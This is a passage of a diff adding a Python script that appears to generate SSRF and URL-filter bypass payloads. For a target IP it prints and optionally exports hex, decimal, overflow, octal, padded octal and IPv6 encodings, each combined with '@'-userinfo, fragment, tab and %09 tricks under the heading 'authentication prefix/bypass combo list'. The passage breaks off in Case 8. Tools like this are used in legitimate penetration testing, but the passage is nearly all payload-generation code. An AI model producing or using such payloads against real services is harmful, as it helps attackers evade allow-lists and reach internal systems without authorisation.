+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP1,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP1,':',PORT,'/',file=f,sep='')
+	print('http://',IP1,':',PORT,':80','/',file=f,sep='')
+	print('http://',IP1,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP1,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP1,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	#===========================================================================
+
+#Case 2 - Dotless hexadecimal
+print(bluecolor,"Dotless hexadecimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+IP2 = HEX_SINGLE(ipFrag3,"yes") + HEX_SINGLE(ipFrag2,"no") + HEX_SINGLE(ipFrag1,"no") + HEX_SINGLE(ipFrag0,"no")
+print('http://',IP2,':',PORT,'/',sep='')
+print('http://',IP2,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP2,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',sep='')
+print('http://',IP2,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP2,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP2,':',PORT,'/',sep='')
+print('http://',IP2,':',PORT,':80','/',sep='')
+print('http://',IP2,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP2,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP2,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print("\n",sep='')
+if EXPORTRESULTS == 'export':
+	print('http://',IP2,':',PORT,'/',file=f,sep='')
+	print('http://',IP2,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP2,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',file=f,sep='')
+	print('http://',IP2,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP2,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP2,':',PORT,'/',file=f,sep='')
+	print('http://',IP2,':',PORT,':80','/',file=f,sep='')
+	print('http://',IP2,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP2,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP2,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+
+#Case 3 - Dotless decimal
+print(bluecolor,"Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+IP3 = str(DECIMAL_SINGLE(ipFrag3,3) + DECIMAL_SINGLE(ipFrag2,2) + DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
+print('http://',IP3,':',PORT,'/',sep='')
+print('http://',IP3,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP3,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',sep='')
+print('http://',IP3,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP3,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP3,':',PORT,'/',sep='')
+print('http://',IP3,':',PORT,':80','/',sep='')
+print('http://',IP3,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP3,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP3,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print("\n",sep='')
+if EXPORTRESULTS == 'export':
+	print('http://',IP3,':',PORT,'/',file=f,sep='')
+	print('http://',IP3,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP3,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',file=f,sep='')
+	print('http://',IP3,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP3,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP3,':',PORT,'/',file=f,sep='')
+	print('http://',IP3,':',PORT,':80','/',file=f,sep='')
+	print('http://',IP3,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP3,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP3,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+
+#Case 4 - Dotted decimal with overflow(256)
+print(bluecolor,"Dotted decimal with overflow(256) IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+IP4 = DEC_OVERFLOW_SINGLE(ipFrag3) + "." + DEC_OVERFLOW_SINGLE(ipFrag2) + "." + DEC_OVERFLOW_SINGLE(ipFrag1) + "." + DEC_OVERFLOW_SINGLE(ipFrag0)
+print('http://',IP4,':',PORT,'/',sep='')
+print('http://',IP4,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP4,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',sep='')
+print('http://',IP4,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP4,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP4,':',PORT,'/',sep='')
+print('http://',IP4,':',PORT,':80','/',sep='')
+print('http://',IP4,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP4,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP4,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print("\n",sep='')
+if EXPORTRESULTS == 'export':
+	print('http://',IP4,':',PORT,'/',file=f,sep='')
+	print('http://',IP4,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP4,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',file=f,sep='')
+	print('http://',IP4,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP4,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP4,':',PORT,'/',file=f,sep='')
+	print('http://',IP4,':',PORT,':80','/',file=f,sep='')
+	print('http://',IP4,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP4,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP4,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+
+#Case 5 - Dotted octal
+print(bluecolor,"Dotted octal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+IP5 = OCT_SINGLE(ipFrag3) + "." + OCT_SINGLE(ipFrag2) + "." + OCT_SINGLE(ipFrag1) + "." + OCT_SINGLE(ipFrag0)
+print('http://',IP5,':',PORT,'/',sep='')
+print('http://',IP5,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP5,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',sep='')
+print('http://',IP5,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP5,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP5,':',PORT,'/',sep='')
+print('http://',IP5,':',PORT,':80','/',sep='')
+print('http://',IP5,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP5,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP5,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print("\n",sep='')
+if EXPORTRESULTS == 'export':
+	print('http://',IP5,':',PORT,'/',file=f,sep='')
+	print('http://',IP5,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP5,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',file=f,sep='')
+	print('http://',IP5,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP5,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP5,':',PORT,'/',file=f,sep='')
+	print('http://',IP5,':',PORT,':80','/',file=f,sep='')
+	print('http://',IP5,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP5,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP5,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+
+#Case 6 - Dotted octal with padding
+print(bluecolor,"Dotted octal with padding IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+IP6 = '0' + OCT_SINGLE(ipFrag3) + "." + '00' + OCT_SINGLE(ipFrag2) + "." + '000' + OCT_SINGLE(ipFrag1) + "." + '0000' + OCT_SINGLE(ipFrag0)
+print('http://',IP6,':',PORT,'/',sep='')
+print('http://',IP6,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP6,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',sep='')
+print('http://',IP6,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP6,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP6,':',PORT,'/',sep='')
+print('http://',IP6,':',PORT,':80','/',sep='')
+print('http://',IP6,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP6,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP6,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print("\n",sep='')
+if EXPORTRESULTS == 'export':
+	print('http://',IP6,':',PORT,'/',file=f,sep='')
+	print('http://',IP6,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP6,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',file=f,sep='')
+	print('http://',IP6,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP6,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP6,':',PORT,'/',file=f,sep='')
+	print('http://',IP6,':',PORT,':80','/',file=f,sep='')
+	print('http://',IP6,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP6,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP6,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+
+#Case 7 - IPv6 compact version
+print(bluecolor,"IPv6 compact version IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+IP7 = '[::' + ipFrag3 + "." + ipFrag2 + "." + ipFrag1 + "." + ipFrag0 + ']'
+print('http://',IP7,':',PORT,'/',sep='')
+print('http://',IP7,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP7,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',sep='')
+print('http://',IP7,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP7,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP7,':',PORT,'/',sep='')
+print('http://',IP7,':',PORT,':80','/',sep='')
+print('http://',IP7,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP7,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP7,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print("\n",sep='')
+if EXPORTRESULTS == 'export':
+	print('http://',IP7,':',PORT,'/',file=f,sep='')
+	print('http://',IP7,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP7,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',file=f,sep='')
+	print('http://',IP7,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP7,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP7,':',PORT,'/',file=f,sep='')
+	print('http://',IP7,':',PORT,':80','/',file=f,sep='')
+	print('http://',IP7,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP7,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP7,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+
+#Case 8 - IPv6 mapped version
+print(bluecolor,"IPv6 mapped version IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+IP8 = '[::ffff:' + ipFrag3 + "." + ipFrag2 + "." + ipFrag1 + "." + ipFrag0 + ']'
+print('http://',IP8,':',PORT,'/',sep='')
+print('http://',IP8,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP8,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'/',sep='')
